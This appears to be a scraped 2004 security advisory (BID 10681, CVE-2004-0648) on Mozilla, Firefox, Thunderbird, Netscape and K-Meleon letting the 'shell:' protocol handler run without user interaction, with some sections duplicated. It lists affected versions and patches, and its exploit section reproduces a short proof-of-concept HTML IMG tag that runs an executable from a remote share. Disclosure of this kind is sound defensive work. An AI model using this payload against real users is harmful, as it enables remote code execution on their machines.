Mozilla External Protocol Handler Weakness
BID:10681
Info
Mozilla External Protocol Handler Weakness
| Bugtraq ID: | 10681 |
| Class: | Design Error |
| CVE: |
CVE-2004-0648 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 08 2004 12:00AM |
| Updated: | Jul 12 2009 06:16AM |
| Credit: | Discovery of this weakness is credited to Keith McCanless. |
| Vulnerable: |
Netscape Navigator 7.1 Netscape Navigator 7.0.2 Mozilla Thunderbird 0.7.1 Mozilla Thunderbird 0.7 Mozilla Firefox 0.9.1 Mozilla Firefox 0.9 rc Mozilla Firefox 0.8 Mozilla Browser 1.7 rc3 Mozilla Browser 1.7 K-Meleon K-Meleon 0.8.2 |
| Not Vulnerable: |
Netscape Navigator 7.2 Mozilla Thunderbird 0.7.2 Mozilla Firefox 0.9.3 Mozilla Firefox 0.9.2 Mozilla Browser 1.8 Alpha 2 Mozilla Browser 1.7.2 Mozilla Browser 1.7.1 K-Meleon K-Meleon 0.9 |
Discussion
Mozilla External Protocol Handler Weakness
Mozilla Internet Browser is reported prone to a weakness that may permit an external protocol to be called without any user interaction. This may expose Mozilla users to vulnerabilities that exist in the underlying operating system or in the software that is the default handler for a registered protocol.
Vulnerabilities in the applications that are invoked by a protocol, and vulnerabilities in the way a called protocol is handled by the host operating system may be exploited using this weakness in the Mozilla browser.
Mozilla Internet Browser is reported prone to a weakness that may permit an external protocol to be called without any user interaction. This may expose Mozilla users to vulnerabilities that exist in the underlying operating system or in the software that is the default handler for a registered protocol.
Vulnerabilities in the applications that are invoked by a protocol, and vulnerabilities in the way a called protocol is handled by the host operating system may be exploited using this weakness in the Mozilla browser.
Exploit / POC
Mozilla External Protocol Handler Weakness
There is no exploit required. Liu Die Yu has supplied a proof of concept for a 'shell:' URI remote file execution vector:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER:
<IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe">
There is no exploit required. Liu Die Yu has supplied a proof of concept for a 'shell:' URI remote file execution vector:
1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT "shell:NETHOOD"
2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
"shared" FOLDER:
<IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe">
Solution / Fix
Mozilla External Protocol Handler Weakness
Solution:
K-Meleon version 0.9 is available to address this issue.
Mozilla has released a patch to address the "shell:" protocol handling weakness; it is available at the following location:
http://www.mozilla.org/security/shell.html
Mozilla has also released new versions of various browsers (Mozilla 1.7.1, Firefox 0.9.2, and Thunderbird 0.7.2) to address this issue.
Mozilla Thunderbird 0.7
Mozilla Thunderbird 0.7.1
Mozilla Firefox 0.8
K-Meleon K-Meleon 0.8.2
Mozilla Firefox 0.9 rc
Mozilla Firefox 0.9.1
Mozilla Browser 1.7 rc3
Mozilla Browser 1.7
Solution:
K-Meleon version 0.9 is available to address this issue.
Mozilla has released a patch to address the "shell:" protocol handling weakness; it is available at the following location:
http://www.mozilla.org/security/shell.html
Mozilla has also released new versions of various browsers (Mozilla 1.7.1, Firefox 0.9.2, and Thunderbird 0.7.2) to address this issue.
Mozilla Thunderbird 0.7
-
Mozilla shellblock.xpi
http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7.1/s hellblock.xpi
Mozilla Thunderbird 0.7.1
-
Mozilla shellblock.xpi
http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7.1/s hellblock.xpi
Mozilla Firefox 0.8
-
Mozilla shellblock.xpi
http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7.1/s hellblock.xpi
K-Meleon K-Meleon 0.8.2
-
K-Meleon K-Meleon 0.9
https://sourceforge.net/project/showfiles.php?group_id=14285
Mozilla Firefox 0.9 rc
-
Mozilla shellblock.xpi
http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7.1/s hellblock.xpi
Mozilla Firefox 0.9.1
-
Mozilla shellblock.xpi
http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7.1/s hellblock.xpi
Mozilla Browser 1.7 rc3
-
Mozilla shellblock.xpi
http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7.1/s hellblock.xpi
Mozilla Browser 1.7
-
Mozilla shellblock.xpi
http://ftp.mozilla.org/pub/mozilla.org/mozilla/releases/mozilla1.7.1/s hellblock.xpi
References
Mozilla External Protocol Handler Weakness
References:
References:
- Bug 167475 -Disable external protocol handlers in all cases, excluding (Mozilla)
- Mozilla Homepage (Mozilla Foundation)
- Netscape Browser Central (Netscape)
- Shell: protocol allows access to local files and can lead to a DOS (Mozilla)
- shell: protocol security issue (Mozilla)
- VU#927014 - Mozilla fails to restrict access to the "shell:" URI handler (CERT/CC)
- MOZILLA: SHELL can execute remote EXE program (
)